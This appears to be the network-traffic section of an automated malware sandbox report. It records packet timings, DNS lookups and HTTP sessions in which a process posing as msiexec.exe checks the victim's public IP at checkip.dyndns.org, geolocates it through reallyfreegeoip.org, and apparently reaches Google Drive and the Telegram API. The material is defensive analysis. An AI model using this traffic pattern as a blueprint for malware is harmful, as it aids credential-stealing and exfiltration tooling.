                                                                                                                                                                    Dec 24, 2024 11:28:34.264547110 CET4990780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:34.383342028 CET8049898193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:34.383455038 CET4989880192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:34.384062052 CET8049907193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:34.384129047 CET4990780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:34.384279013 CET4990780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:34.503674030 CET8049907193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:35.653840065 CET8049907193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:35.655107975 CET49912443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:35.655148029 CET44349912172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:35.655448914 CET49912443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:35.655448914 CET49912443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:35.655484915 CET44349912172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:35.701052904 CET4990780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:36.865530014 CET44349912172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:36.867686033 CET49912443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:36.867697001 CET44349912172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:37.311718941 CET44349912172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:37.311786890 CET44349912172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:37.311860085 CET49912443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:37.312705040 CET49912443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:37.317074060 CET4991780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:37.436578035 CET8049917193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:37.436695099 CET4991780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:37.436908007 CET4991780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:37.556375980 CET8049917193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:38.704668999 CET8049917193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:38.705920935 CET49920443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:38.705961943 CET44349920172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:38.706036091 CET49920443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:38.706362963 CET49920443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:38.706377983 CET44349920172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:38.747951984 CET4991780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:39.917886019 CET44349920172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:39.920335054 CET49920443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:39.920358896 CET44349920172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:40.365830898 CET44349920172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:40.365894079 CET44349920172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:40.366004944 CET49920443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:40.366437912 CET49920443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:40.369693995 CET4991780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:40.370208979 CET4992580192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:40.489382982 CET8049917193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:40.489463091 CET4991780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:40.489638090 CET8049925193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:40.489732981 CET4992580192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:40.489877939 CET4992580192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:40.609304905 CET8049925193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:41.757795095 CET8049925193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:41.758887053 CET49930443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:41.758936882 CET44349930172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:41.759038925 CET49930443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:41.759248972 CET49930443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:41.759265900 CET44349930172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:41.810587883 CET4992580192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:42.969897032 CET44349930172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:42.971481085 CET49930443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:42.971504927 CET44349930172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:43.419576883 CET44349930172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:43.419651985 CET44349930172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:43.419709921 CET49930443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:43.420238018 CET49930443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:43.423517942 CET4992580192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:43.424500942 CET4993380192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:43.543644905 CET8049925193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:43.544172049 CET8049933193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:43.544284105 CET4992580192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:43.544323921 CET4993380192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:43.544482946 CET4993380192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:43.663909912 CET8049933193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:44.820162058 CET8049933193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:44.837510109 CET49938443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:44.837546110 CET44349938172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:44.837610960 CET49938443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:44.841272116 CET49938443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:44.841305017 CET44349938172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:44.872970104 CET4993380192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:46.054657936 CET44349938172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:46.056355953 CET49938443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:46.056390047 CET44349938172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:46.508259058 CET44349938172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:46.508336067 CET44349938172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:46.508477926 CET49938443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:46.509095907 CET49938443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:46.512276888 CET4993380192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:46.513087034 CET4994480192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:46.632074118 CET8049933193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:46.632159948 CET4993380192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:46.632551908 CET8049944193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:46.632723093 CET4994480192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:46.632821083 CET4994480192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:46.752306938 CET8049944193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:47.898505926 CET8049944193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:47.899524927 CET49947443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:47.899545908 CET44349947172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:47.899614096 CET49947443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:47.899805069 CET49947443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:47.899818897 CET44349947172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:47.951133013 CET4994480192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:49.109750032 CET44349947172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:49.111366034 CET49947443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:49.111392975 CET44349947172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:49.552397966 CET44349947172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:49.552469015 CET44349947172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:49.552544117 CET49947443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:49.552901030 CET49947443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:49.555380106 CET4994480192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:49.556308031 CET4995280192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:49.675168037 CET8049944193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:49.675278902 CET4994480192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:49.675760031 CET8049952193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:49.675836086 CET4995280192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:49.675983906 CET4995280192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:49.795618057 CET8049952193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:50.945177078 CET8049952193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:50.946748018 CET49957443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:50.946780920 CET44349957172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:50.946871996 CET49957443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:50.947107077 CET49957443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:50.947119951 CET44349957172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:50.997957945 CET4995280192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:52.157044888 CET44349957172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:52.158543110 CET49957443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:52.158565998 CET44349957172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:52.603935957 CET44349957172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:52.604008913 CET44349957172.67.177.134192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:52.604130983 CET49957443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:52.604561090 CET49957443192.168.2.9172.67.177.134
                                                                                                                                                                    Dec 24, 2024 11:28:52.632395983 CET4995280192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:52.753797054 CET8049952193.122.6.168192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:52.753863096 CET4995280192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:28:52.773067951 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:28:52.773094893 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:52.773170948 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:28:52.773569107 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:28:52.773581982 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:54.143176079 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:54.143336058 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:28:54.145045042 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:28:54.145050049 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:54.145277023 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:54.146734953 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:28:54.187339067 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:54.646500111 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:54.646573067 CET44349962149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:54.646627903 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:28:54.648787975 CET49962443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:00.345232964 CET4990780192.168.2.9193.122.6.168
                                                                                                                                                                    Dec 24, 2024 11:29:00.556015015 CET49980443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:00.556056976 CET44349980149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:00.556140900 CET49980443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:00.556418896 CET49980443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:00.556433916 CET44349980149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:01.921160936 CET44349980149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:01.923190117 CET49980443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:01.923237085 CET44349980149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:01.923335075 CET49980443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:01.923362017 CET44349980149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:02.477536917 CET44349980149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:02.477617025 CET44349980149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:02.477716923 CET49980443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:02.478176117 CET49980443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:04.052860022 CET49990443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:04.052911043 CET44349990149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:04.052978039 CET49990443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:04.053221941 CET49990443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:04.053231001 CET44349990149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:05.420406103 CET44349990149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:05.422550917 CET49990443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:05.422568083 CET44349990149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:05.422652006 CET49990443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:05.422657967 CET44349990149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:06.176404953 CET44349990149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:06.176491022 CET44349990149.154.167.220192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:29:06.176635981 CET49990443192.168.2.9149.154.167.220
                                                                                                                                                                    Dec 24, 2024 11:29:06.177133083 CET49990443192.168.2.9149.154.167.220
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 24, 2024 11:28:16.445419073 CET5385553192.168.2.91.1.1.1
                                                                                                                                                                    Dec 24, 2024 11:28:16.583628893 CET53538551.1.1.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:19.219247103 CET6357253192.168.2.91.1.1.1
                                                                                                                                                                    Dec 24, 2024 11:28:19.364240885 CET53635721.1.1.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:25.087977886 CET5173253192.168.2.91.1.1.1
                                                                                                                                                                    Dec 24, 2024 11:28:25.226165056 CET53517321.1.1.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:27.306672096 CET5170753192.168.2.91.1.1.1
                                                                                                                                                                    Dec 24, 2024 11:28:27.446676970 CET53517071.1.1.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:52.633009911 CET5352253192.168.2.91.1.1.1
                                                                                                                                                                    Dec 24, 2024 11:28:52.772417068 CET53535221.1.1.1192.168.2.9
                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 24, 2024 11:28:16.445419073 CET192.168.2.91.1.1.10xb2c1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:19.219247103 CET192.168.2.91.1.1.10xa32bStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:25.087977886 CET192.168.2.91.1.1.10x3941Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:27.306672096 CET192.168.2.91.1.1.10xa69cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:52.633009911 CET192.168.2.91.1.1.10x1691Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 24, 2024 11:27:03.500042915 CET1.1.1.1192.168.2.90xaec7No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:27:03.500042915 CET1.1.1.1192.168.2.90xaec7No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:16.583628893 CET1.1.1.1192.168.2.90xb2c1No error (0)drive.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:19.364240885 CET1.1.1.1192.168.2.90xa32bNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:25.226165056 CET1.1.1.1192.168.2.90x3941No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:25.226165056 CET1.1.1.1192.168.2.90x3941No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:25.226165056 CET1.1.1.1192.168.2.90x3941No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:25.226165056 CET1.1.1.1192.168.2.90x3941No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:25.226165056 CET1.1.1.1192.168.2.90x3941No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:25.226165056 CET1.1.1.1192.168.2.90x3941No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:27.446676970 CET1.1.1.1192.168.2.90xa69cNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:27.446676970 CET1.1.1.1192.168.2.90xa69cNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 24, 2024 11:28:52.772417068 CET1.1.1.1192.168.2.90x1691No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                    • drive.google.com
                                                                                                                                                                    • drive.usercontent.google.com
                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                    • api.telegram.org
                                                                                                                                                                    • checkip.dyndns.org
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.949881193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:25.351393938 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 24, 2024 11:28:26.620445967 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:26 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Dec 24, 2024 11:28:26.623927116 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 24, 2024 11:28:27.031100988 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:26 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Dec 24, 2024 11:28:29.132431030 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 24, 2024 11:28:29.537750006 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:29 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.949898193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:31.327245951 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 24, 2024 11:28:32.596045971 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:32 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.949907193.122.6.168807192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 24, 2024 11:28:34.384279013 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Dec 24, 2024 11:28:35.653840065 CET273INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:35 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


